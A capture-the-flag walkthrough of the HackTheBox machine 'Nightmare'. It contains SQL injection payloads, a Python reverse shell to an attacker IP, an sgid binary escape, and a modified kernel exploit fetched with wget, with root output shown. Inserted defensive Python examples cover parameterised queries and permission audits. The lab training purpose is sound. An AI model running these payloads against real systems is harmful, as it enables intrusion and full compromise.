- Hackthebox
- HTB
- Nightmare
- 10.10.10.66
- [1] This machine annoyed me, a lot, and the community is full of elitists (you know who you are) who look down on those who want to learn. This guide is to fight back against that poisonous environment for those who want to learn.
- [2] I will continue to release these guides whilst that insipid culture exists.
- [3] "Every society has the criminals it deserves." Emma Goldman
- NMAP -
- 2 Ports
- 80 and 2222
- Focus on Port 80 for now.
- Register a user using burp.
- http://10.10.10.66/register.php
- Intercept the request and modify it to be
- user=') union select table_schema,table_name from information_Schema.tables#&pass=pass&register=Register
- Log in with.
- Username = ') union select table_schema,table_name from information_Schema.tables
- Password = pass
- Log in with the full username above; the SQLi is working.
- Now to get credentials.
- In burp create another user
- user=') union select username, password from sysadmin.users#&pass=pass&register=Register
- Login again.
- Note the ftp user credentials.
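The registration and login requests above only work because user input is spliced straight into the SQL text. As an added example (not code from the original writeup or the box), the following Python script models that pattern against an in-memory SQLite database and puts the parameterised form beside it. The `users` table, the `login_*` function names and the SQLite-flavoured payload (`sqlite_master` and `--` standing in for the page's MySQL `information_schema` and `#`) are assumptions constructed for the demonstration.

```python
import sqlite3

# Constructed schema standing in for the box's database; the real table and
# column names are an assumption for this example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'example-secret')")
    return db

# The page's payload adapted to SQLite: ') closes the quote and parenthesis,
# the UNION appends rows from the schema catalogue, and -- comments out the
# remainder of the original query.
PAYLOAD = "') union select type, name from sqlite_master--"

def login_vulnerable(db, user, pw):
    """Hypothetical reconstruction of the vulnerable pattern: the input is
    concatenated into the query text, so the payload rewrites the query."""
    sql = ("SELECT username, password FROM users "
           f"WHERE (username='{user}' AND password='{pw}')")
    return db.execute(sql).fetchall()

def login_hardened(db, user, pw):
    """Parameterised query: the driver binds the values, so the payload is
    compared as a literal username and matches no row."""
    sql = "SELECT username, password FROM users WHERE username=? AND password=?"
    return db.execute(sql, (user, pw)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "pass"))  # leaks ('table', 'users')
    print("hardened:  ", login_hardened(db, PAYLOAD, "pass"))    # []
```

The hardened function still compares a plaintext password, which is deliberate so the two queries differ only in how input reaches the database; a real login would compare a salted hash.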
- sftp to the box with the sftp credentials.
- Try to write or read a file in /etc/proc.
- It works!
- Getting the SSH version
- SSH-2.0-OpenSSH 32bit (not so recent ver)
- This is a clue: an old version with an sftp user that can read and write to /etc/proc.
- Google the below.
- sftp misconfig /etc/proc exploit
- First URL Full Disclosure: OpenSSH <=6.6 SFTP
- Use this exploit to get a reverse shell on port 80
- Change the line "char shell_commands[] =" to be
- char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.x.x\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&";
- Compile and execute with a netcat listener on port 80.
- Initial enumeration shows there are no writable folders and things are "limited".
- There is a cron job running every 15 minutes
- cat /etc/cron*
- */15 * * * * decoder /home/decoder/test/script.sh
- Looking for the obvious: the user in /home is decoder, so look for files or directories owned by that user or group.
- find / -type f -group decoder 2>/dev/null
- /usr/bin/sls is found.
- Investigating this binary
- ls -lah /usr/bin/sls
- -rwxr-sr-x 1 root decoder 8.9K Feb 18 2016 /usr/bin/sls
- The file is owned by root with group decoder and has the sgid bit set, so it runs with decoder's group id. Running strings against the file shows it runs /bin/ls; more investigation shows there is a filter of escape characters.
- Looking at the man page of ls, the escape switch is -b.
- Try.
- /usr/bin/sls -b $'\n /bin/bash -ip'
- id
- uid=1002(ftpuser) gid=1002(ftpuser) egid=1001(decoder) groups=1001(decoder),1002(ftpuser)
- Now read user.txt
- cat /home/decoder/user.txt
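The sls binary shows why filtering escape characters out of arguments that reach a privileged ls is not enough: a newline or an unexpected flag still changes what the child does. As an added example, not part of the original writeup or the box's binary, this Python wrapper takes the opposite approach and allow-lists both flags and path characters before invoking /bin/ls with an argument vector and no shell. The SAFE_FLAGS set, the path pattern, the function names and the reconstructed PAGE_PAYLOAD are assumptions constructed for the demonstration.

```python
import re
import subprocess

# Allow-list (assumed for this example): only these flags, and only paths made
# of plain filename characters. Anything else is rejected outright.
SAFE_FLAGS = {"-l", "-a", "-h", "-la", "-lah", "-lh"}
SAFE_PATH = re.compile(r"[A-Za-z0-9._/-]+")

# The page's bypass argument as bash's $'\n /bin/bash -ip' delivers it to the
# wrapper: a single argument that begins with a newline.
PAGE_PAYLOAD = ["-b", "\n /bin/bash -ip"]

def build_argv(args):
    """Validate user arguments and return the argv to exec, or raise ValueError.

    Flags must be in SAFE_FLAGS; paths must fully match SAFE_PATH, which
    excludes newlines, spaces and quotes. Flags are placed before '--' so ls
    cannot interpret a path that starts with '-' as an option.
    """
    flags, paths = [], []
    for a in args:
        if a.startswith("-"):
            if a not in SAFE_FLAGS:
                raise ValueError(f"flag not allowed: {a!r}")
            flags.append(a)
        elif SAFE_PATH.fullmatch(a):
            paths.append(a)
        else:
            raise ValueError(f"path contains disallowed characters: {a!r}")
    return ["/bin/ls", *flags, "--", *paths]

def safe_ls(args):
    """Run the validated command without a shell and return ls's stdout."""
    argv = build_argv(args)
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout

def rejects(args):
    """True if the wrapper refuses the argument list."""
    try:
        build_argv(args)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(build_argv(["-l", "/tmp"]))
    print("page payload rejected:", rejects(PAGE_PAYLOAD))
```

The point of the allow-list is that a control character never has to be anticipated: the newline in the page's payload is rejected not because it was blacklisted but because it is not in the set of characters a path is permitted to contain.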
- Coming back to the cron job, we can write files as decoder to the test folder.
- ls -lah /home/decoder
- drwx-wx--x 2 root decoder 4.0K Feb 25 15:22 test
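A cron job that runs a script out of a directory writable by a non-root group is the misconfiguration behind this step, and it is easy to audit. As an added example, not part of the original writeup, the following Python script parses /etc/crontab-style entries (five time fields, user, command) and flags every entry whose script, or the directory that would hold it, is group- or world-writable. The constructed crontab lines and the temporary directory layout mirroring the drwx-wx--x test directory are assumptions for the demonstration.

```python
import os
import stat
import tempfile

def parse_cron_line(line):
    """Return (user, command) for a system-crontab entry, or None for
    blanks, comments and variable assignments such as PATH=..."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(None, 6)
    if "=" in fields[0] or len(fields) < 7:
        return None
    return fields[5], fields[6]

def writable_by_group_or_other(path):
    """True if the mode bits grant write to group or other."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_cron(lines):
    """Return (user, script, checked_path, mode) for each entry whose script,
    or its parent directory, can be modified by someone other than the owner."""
    findings = []
    for line in lines:
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        user, command = parsed
        script = command.split()[0]
        if not os.path.isabs(script):
            continue
        # A missing script is the interesting case: whoever can write the
        # directory gets to create it, and cron will run it as `user`.
        target = script if os.path.exists(script) else os.path.dirname(script)
        if os.path.exists(target) and writable_by_group_or_other(target):
            mode = oct(os.stat(target).st_mode & 0o777)
            findings.append((user, script, target, mode))
    return findings

def demo():
    """Build a constructed layout and audit constructed crontab lines."""
    with tempfile.TemporaryDirectory() as root:
        weak = os.path.join(root, "home", "decoder", "test")  # like the page's test dir
        os.makedirs(weak)
        os.chmod(weak, 0o731)                                  # drwx-wx--x
        good = os.path.join(root, "opt", "bin")
        os.makedirs(good)
        os.chmod(good, 0o755)
        backup = os.path.join(good, "backup.sh")
        with open(backup, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(backup, 0o755)
        crontab = [
            "# constructed sample crontab",
            "PATH=/usr/local/bin:/usr/bin:/bin",
            f"*/15 * * * * decoder {weak}/script.sh",
            f"0 3 * * * root {backup} --full",
        ]
        return audit_cron(crontab)

if __name__ == "__main__":
    for user, script, target, mode in demo():
        print(f"[!] {user}: {script} -> {target} is {mode}")
```

Run against real input, the same function takes the lines of /etc/crontab and the files under /etc/cron.d; per-user crontabs lack the user field and would need the parser adjusted.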
- Looking for kernel exploits.
- Google to the rescue
- google -> linux 4.8.0-58-generic exploit
- Exploit is found
- https://www.exploit-db.com/exploits/43418/
- Download to the local machine.
- Analysing the exploit, note that running it as-is will fail: the exploit cannot match the version info because the release strings on this box have been changed.
- For example.
- Line 451 reads the release.
- /etc/lsb-release
- if the file is examined.
- cat /etc/lsb-release
- DISTRIB_ID=s390x
- DISTRIB_RELEASE=0.1
- DISTRIB_CODENAME=bladerunner
- DISTRIB_DESCRIPTION="s390x GNU/Linux"
- This won't match any items in the array at the beginning of the file.
- A hacky way to fix this is to reduce the array to only have the exploit we want.
- Change
- int kernel = -1;
- to be
- int kernel = 0;
- Delete all array items except the one below, since it matches uname -a:
- { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
- Now force the exploit to accept this version by commenting out lines 504 and 505
- printf("[-] kernel version not recognized\n");
- exit(EXIT_FAILURE);
- compile the exploit and upload to the server.
- gcc 43418.c -o 43418
- wget http://10.10.x.x/43418 -O /home/decoder/test/43418
- chmod +x /home/decoder/test/43418
- Running as the ftpuser with the decoder egid set gives an error
- /home/decoder/test/43418
- [.] starting
- [.] checking distro and kernel versions
- [~] done, versions looks good
- [.] checking SMEP and SMAP
- [~] done, looks good
- [.] setting up namespace sandbox
- [-] write_file(/proc/self/set_groups): Permission denied
- Exit the egid shell back to the ftpuser shell and run the exploit again.
- /home/decoder/test/43418
- [.] starting
- [.] checking distro and kernel versions
- [~] done, versions looks good
- [.] checking SMEP and SMAP
- [~] done, looks good
- [.] setting up namespace sandbox
- [~] done, namespace sandbox set up
- [.] KASLR bypass enabled, getting kernel addr
- [~] done, kernel text: ffffffff98e00000
- [.] commit_creds: ffffffff98ea5d20
- [.] prepare_kernel_cred: ffffffff98ea6110
- [.] SMEP bypass enabled, mmapping fake stack
- [~] done, fake stack mmapped
- [.] executing payload ffffffff98e17c55
- [~] done, should be root now
- [.] checking if we got root
- [+] got r00t ^_^
- root@nightmare:/#
- That's all, folks.